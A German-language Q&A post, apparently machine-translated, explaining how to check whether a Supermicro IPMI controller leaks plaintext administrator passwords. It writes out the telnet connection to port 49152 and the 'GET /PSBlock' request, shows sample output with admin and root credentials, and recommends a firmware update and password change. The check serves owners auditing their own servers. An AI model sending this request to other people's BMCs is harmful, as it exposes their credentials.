Wie überprüfe ich, ob mein Supermicro IPMI über das Web mit einem Klartext-Administratorkennwort kompromittiert ist?

Ich habe einige Supermicro-Server mit IPMI ausgeführt, und wie in diesem Blog beschrieben ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) besteht eine kritische Sicherheitsanfälligkeit für Holen Sie sich Klartext-Administratorkennwörter von jedem entfernten Standort.

Wie überprüfe ich, ob mein Server-Motherboard kompromittiert ist?

Telnet einfach mit der IPMI-IP-Adresse in Port 49152 und führt eine bestimmte GET-Anfrage durch. Sie sollten Ihre Benutzer und Passwörter erhalten, wenn Sie kompromittiert sind.

telnet server.example.com 49152

Nachdem die Verbindung GET /PSBlockdie Ergebnisse angefordert und angesehen hat, sollte es ungefähr so ​​aussehen:

Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock

Antworten:

=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??

Um dieses Problem zu beheben, aktualisieren Sie die IPMI-Firmware auf die neueste Version. Die Firmware ist spezifisch für Ihren IPMI-Controller, daher sollten Sie die auf der Supermicro-Website angegebene Firmware erhalten.

Ändern Sie dann nach dem Aktualisieren der Firmware Ihre Passwörter .